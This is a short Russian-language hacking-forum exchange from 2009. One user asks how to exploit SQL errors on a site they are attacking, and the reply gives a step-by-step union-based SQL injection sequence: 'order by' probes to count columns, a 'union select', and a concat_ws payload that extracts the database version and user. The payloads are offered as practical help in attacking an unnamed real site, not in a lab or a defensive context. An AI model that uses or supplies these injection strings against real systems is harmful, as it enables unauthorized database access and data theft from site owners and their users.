12.11.2009, 21:27
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
С нами:
8717851
Репутация:
90
|
|
Сообщение от fng
Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...
Можно ли что-то сделать с этими параметрами?
Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает?
order by 10000 --
order by 1 --
order by 4 --
union select 1,2,3,4 --
выводит 2,4 например
union select 1,concat_ws(0x3a,version(),user()),3,4 --
|
|
|